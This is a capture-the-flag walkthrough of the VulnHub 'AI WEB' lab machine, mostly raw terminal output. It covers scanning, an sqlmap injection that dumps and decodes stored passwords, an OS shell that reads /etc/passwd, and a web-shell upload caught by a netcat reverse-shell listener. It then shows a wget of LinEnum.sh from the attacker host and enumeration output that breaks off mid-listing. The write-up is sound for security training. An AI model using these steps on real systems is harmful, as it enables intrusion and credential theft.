AI WEB (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.65.158
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-31 17:25 GMT
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
WARNING: RST from 192.168.65.158 port 80 — is this port really open?
Nmap scan report for 192.168.65.158
Host is up (0.00018s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http?
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.21
OS details: Linux 2.4.21
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms 192.168.65.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

now on browser

http://192.168.65.158/

Let’s browser another page which we got in our port scan. When we open the /m3diNf0/ in our browser we get a Forbidden message as shown in the given image.

http://192.168.65.158/m3diNf0/

During our port scan, we found another directory named /se3reTdir777/uploads/. Let’s try to browse it. On opening it in our Web Browser, we get a similar Forbidden Message as earlier.

http://192.168.65.158/se3reTdir777/uploads/

root@kali:~/Downloads# dirb http://192.168.65.158/m3diNf0/

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Sat Aug 31 17:34:43 2019
URL_BASE: http://192.168.65.158/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.65.158/m3diNf0/ —-
+ http://192.168.65.158/m3diNf0/info.php (CODE:200|SIZE:84266)

—————–
END_TIME: Sat Aug 31 17:34:46 2019
DOWNLOADED: 4612 – FOUND: 1

now on browser

http://192.168.65.158/m3diNf0/info.php

Previously we tried to open the se3reTdir777/uploads. Now, we tried to browse the se3reTdir777 directory. It gives us a User ID Submission Form as shown in the image given below.

http://192.168.65.158/se3reTdir777/

try id:1

we get

Id:1
First Name: admin
Last Name: admin

now try to intercept the traffic

root@kali:~# gedit test

POST /se3reTdir777/ HTTP/1.1
Host: 192.168.65.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.65.158/se3reTdir777/
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Connection: close
Upgrade-Insecure-Requests: 1

uid=1&Operation=Submit

root@kali:~/Downloads# sqlmap -r test –dbs –batch

available databases [2]:
[*] aiweb1
[*] information_schema

root@kali:~/Downloads# sqlmap -r test -D aiweb1 –dump-all –batch

Database: aiweb1
Table: systemUser
[3 entries]
+—-+———–+———————————————-+
| id | userName | password |
+—-+———–+———————————————-+
| 1 | t00r | RmFrZVVzZXJQYXNzdzByZA== |
| 2 | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== |
| 3 | u3er | TjB0VGhpczBuZUFsczA= |
+—-+———–+———————————————-+

[17:41:26] [INFO] table ‘aiweb1.systemUser’ dumped to CSV file ‘/root/.sqlmap/output/192.168.65.158/dump/aiweb1/systemUser.csv’
[17:41:26] [INFO] fetching columns for table ‘user’ in database ‘aiweb1’
[17:41:26] [INFO] fetching entries for table ‘user’ in database ‘aiweb1’
Database: aiweb1
Table: user
[3 entries]
+—-+———-+———–+
| id | lastName | firstName |
+—-+———-+———–+
| 1 | admin | admin |
| 2 | root | root |
| 3 | mysql | mysql |
+—-+———-+———–+

We copied the password form the terminal here and tried to decode them using the BurpSuite Decoder. After decoding, we have the following credentials.

Id Username Password
1 t00r FakeUserPassw0rd
2 aiweb1pwn MyEvilPass_f908sdaf9_sadfasf0sa
3 u3er N0tThisOneAls0

now here from

http://192.168.65.158/m3diNf0/info.php

we can see

DOCUMENT_ROOT : /home/www/html/web1x443290o2sdf92213

root@kali:~/Downloads# sqlmap -r test -D aiweb1 –os-shell

4
y
2

/home/www/html/web1x443290o2sdf92213

not working

try again

root@kali:~/Downloads# sqlmap -r test -D aiweb1 –os-shell

4
y
2

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

os-shell>

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aiweb1:x:1000:1000:AIWEB1:/home/aiweb1:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh

So, we went back to the sqlmap result. It showed us a link” /se3reTdir777/uploads/tmpujsyk.php”. On opening, we have the upload page as shown in the image given below. We can see that we have the browse button where we can choose the path of our file and provide the path on the victim system, the location we want the file to save.

http://192.168.65.158/se3reTdir777/uploads/tmpujsyk.php

upload the file shell.php and click upload

it upload on this path

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

now on browser

http://192.168.65.158/se3reTdir777/uploads/shell.php

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.65.158.
Ncat: Connection from 192.168.65.158:34188.
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
18:04:24 up 39 min, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@aiweb1:/$ cd /tmp

www-data@aiweb1:/tmp$ wget http://192.168.65.151:8000/LinEnum.sh
wget http://192.168.65.151:8000/LinEnum.sh
–2019-08-31 18:06:52– http://192.168.65.151:8000/LinEnum.sh
Connecting to 192.168.65.151:8000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45639 (45K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh 100%[===================>] 44.57K –.-KB/s in 0.002s

2019-08-31 18:06:52 (21.8 MB/s) – ‘LinEnum.sh’ saved [45639/45639]

www-data@aiweb1:/tmp$ chmod 777 LinEnum.sh
chmod 777 LinEnum.sh

www-data@aiweb1:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sat Aug 31 18:07:48 UTC 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION=”Ubuntu 18.04.3 LTS”
NAME=”Ubuntu”
VERSION=”18.04.3 LTS (Bionic Beaver)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 18.04.3 LTS”
VERSION_ID=”18.04″
HOME_URL=”https://www.ubuntu.com/”
SUPPORT_URL=”https://help.ubuntu.com/”
BUG_REPORT_URL=”https://bugs.launchpad.net/ubuntu/”
PRIVACY_POLICY_URL=”https://www.ubuntu.com/legal/terms-and-policies/privacy-policy”
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

[-] Hostname:
aiweb1

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/2 192.168.187.1 Tue Aug 20 10:00:57 +0000 2019
aiweb1 tty1 Wed Aug 21 09:33:12 +0000 2019

[-] Who else is logged on:
18:07:48 up 43 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(aiweb1) gid=1000(aiweb1) groups=1000(aiweb1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
uid=111(mysql) gid=113(mysql) groups=113(mysql)
uid=1001(aiweb1pwn) gid=1001(aiweb1pwn) groups=1001(aiweb1pwn)

[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(aiweb1) gid=1000(aiweb1) groups=1000(aiweb1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aiweb1:x:1000:1000:AIWEB1:/home/aiweb1:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh

[-] Super user account(s):
root

[-] Accounts that have recently used sudo:
/home/aiweb1/.sudo_as_admin_successful

[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Aug 20 06:44 .
drwxr-xr-x 24 root root 4.0K Aug 20 05:12 ..
drwxr-xr-x 4 aiweb1 aiweb1 4.0K Aug 20 13:19 aiweb1
drwxr-xr-x 3 root root 4.0K Aug 20 06:44 www

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/
INVOCATION_ID=73f28ed600c54fd983b9b4a60b07fa6b
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/tmp
JOURNAL_STREAM=9:30376
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/tmux
/usr/bin/screen

[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r–r– 1 root root 722 Nov 16 2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Aug 20 06:22 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 102 Nov 16 2017 .placeholder
-rw-r–r– 1 root root 589 Jan 30 2019 mdadm
-rw-r–r– 1 root root 712 Jan 17 2018 php
-rw-r–r– 1 root root 191 Aug 5 19:24 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Aug 31 17:25 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 539 Jul 16 18:14 apache2
-rwxr-xr-x 1 root root 376 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 30 2019 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Aug 5 19:23 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Aug 5 19:23 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Aug 5 19:24 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don’t have to run the `crontab’
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts –report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.monthly )
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2019-08-31 18:09:00 UTC 1min 7s left Sat 2019-08-31 17:39:21 UTC 28min ago phpsessionclean.timer phpsessionclean.service
Sun 2019-09-01 00:09:03 UTC 6h left Sat 2019-08-31 17:24:37 UTC 43min ago apt-daily.timer apt-daily.service
Sun 2019-09-01 03:13:46 UTC 9h left Sat 2019-08-31 17:24:37 UTC 43min ago motd-news.timer motd-news.service
Sun 2019-09-01 06:10:00 UTC 12h left Sat 2019-08-31 17:24:37 UTC 43min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2019-09-01 17:39:37 UTC 23h left Sat 2019-08-31 17:39:37 UTC 28min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2019-09-02 00:00:00 UTC 1 day 5h left Sat 2019-08-31 17:24:37 UTC 43min ago fstrim.timer fstrim.service

6 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING ##########################################
[-] Network and IP info:
ens32: flags=4163<up,broadcast,running,multicast> mtu 1500
inet 192.168.65.158 netmask 255.255.255.0 broadcast 192.168.65.255
inet6 fe80::20c:29ff:fe93:feb3 prefixlen 64 scopeid 0x20 ether 00:0c:29:93:fe:b3 txqueuelen 1000 (Ethernet)
RX packets 1374531 bytes 89385162 (89.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9260 bytes 3007611 (3.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</up,broadcast,running,multicast>

lo: flags=73<up,loopback,running> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 112 bytes 9500 (9.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 112 bytes 9500 (9.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</up,loopback,running>

[-] ARP history:
? (192.168.65.254) at 00:50:56:f1:4b:24 [ether] on ens32
? (192.168.65.67) at 00:0c:29:7f:39:f2 [ether] on ens32
? (192.168.65.151) at 00:0c:29:7f:39:f2 [ether] on ens32
_gateway (192.168.65.2) at 00:50:56:f1:c9:80 [ether] on ens32

[-] Nameserver(s):
nameserver 127.0.0.53

[-] Nameserver(s):
Global
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
lan
local
private
test

Link 2 (ens32)
Current Scopes: DNS
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no
DNS Servers: 192.168.65.2
DNS Domain: localdomain

[-] Default route:
default _gateway 0.0.0.0 UG 100 0 0 ens32

[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN –
tcp 0 0 192.168.65.158:34190 192.168.65.151:1234 ESTABLISHED 2672/sh
tcp 0 0 192.168.65.158:34188 192.168.65.151:1234 ESTABLISHED 2667/sh
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 192.168.65.158:80 192.168.65.151:43402 ESTABLISHED –
tcp6 0 0 192.168.65.158:80 192.168.65.151:43406 ESTABLISHED –

[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 127.0.0.53:53 0.0.0.0:* –
udp 0 0 192.168.65.158:68 0.0.0.0:* –

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 159944 9172 ? Ss 17:24 0:02 /sbin/init maybe-ubiquity
root 2 0.0 0.0 0 0 ? S 17:24 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I 17:24 0:00 [kworker/0:0]
root 4 0.0 0.0 0 0 ? I< 17:24 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 17:24 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 17:24 0:01 [ksoftirqd/0] root 8 0.1 0.0 0 0 ? I 17:24 0:04 [rcu_sched] root 9 0.0 0.0 0 0 ? I 17:24 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 17:24 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 17:24 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 17:24 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 17:24 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? I< 17:24 0:00 [netns] root 15 0.0 0.0 0 0 ? S 17:24 0:00 [rcu_tasks_kthre] root 16 0.0 0.0 0 0 ? S 17:24 0:00 [kauditd] root 17 0.0 0.0 0 0 ? S 17:24 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S 17:24 0:00 [oom_reaper] root 19 0.0 0.0 0 0 ? I< 17:24 0:00 [writeback] root 20 0.0 0.0 0 0 ? S 17:24 0:00 [kcompactd0] root 21 0.0 0.0 0 0 ? SN 17:24 0:00 [ksmd] root 22 0.0 0.0 0 0 ? SN 17:24 0:00 [khugepaged] root 23 0.0 0.0 0 0 ? I< 17:24 0:00 [crypto] root 24 0.0 0.0 0 0 ? I< 17:24 0:00 [kintegrityd] root 25 0.0 0.0 0 0 ? I< 17:24 0:00 [kblockd] root 26 0.0 0.0 0 0 ? I< 17:24 0:00 [ata_sff] root 27 0.0 0.0 0 0 ? I< 17:24 0:00 [md] root 28 0.0 0.0 0 0 ? I< 17:24 0:00 [edac-poller] root 29 0.0 0.0 0 0 ? I< 17:24 0:00 [devfreq_wq] root 30 0.0 0.0 0 0 ? I< 17:24 0:00 [watchdogd] root 34 0.0 0.0 0 0 ? S 17:24 0:00 [kswapd0] root 35 0.0 0.0 0 0 ? I< 17:24 0:00 [kworker/u129:0] root 36 0.0 0.0 0 0 ? S 17:24 0:00 [ecryptfs-kthrea] root 78 0.0 0.0 0 0 ? I< 17:24 0:00 [kthrotld] root 79 0.0 0.0 0 0 ? I< 17:24 0:00 [acpi_thermal_pm] root 80 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_0] root 81 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_0] root 82 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_1] root 83 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_1] root 89 0.0 0.0 0 0 ? I< 17:24 0:00 [ipv6_addrconf] root 98 0.0 0.0 0 0 ? I< 17:24 0:00 [kstrp] root 115 0.0 0.0 0 0 ? I< 17:24 0:00 [charger_manager] root 168 0.0 0.0 0 0 ? I< 17:24 0:00 [mpt_poll_0] root 169 0.0 0.0 0 0 ? I< 17:24 0:00 [mpt/0] root 176 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_2] root 181 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_2] root 182 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_3] root 184 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_3] root 186 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_4] root 188 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_4] root 190 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_5] root 192 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_5] root 194 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_6] root 197 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_6] root 198 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_7] root 200 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_7] root 202 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_8] root 204 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_8] root 206 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_9] root 208 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_9] root 210 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_10] root 212 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_10] root 213 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_11] root 215 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_11] root 216 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_12] root 218 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_12] root 220 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_13] root 221 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_13] root 223 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_14] root 224 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_14] root 226 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_15] root 228 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_15] root 230 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_16] root 232 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_16] root 234 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_17] root 236 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_17] root 238 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_18] root 240 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_18] root 241 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_19] root 242 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_19] root 243 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_20] root 244 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_20] root 245 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_21] root 246 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_21] root 247 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_22] root 248 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_22] root 249 0.0 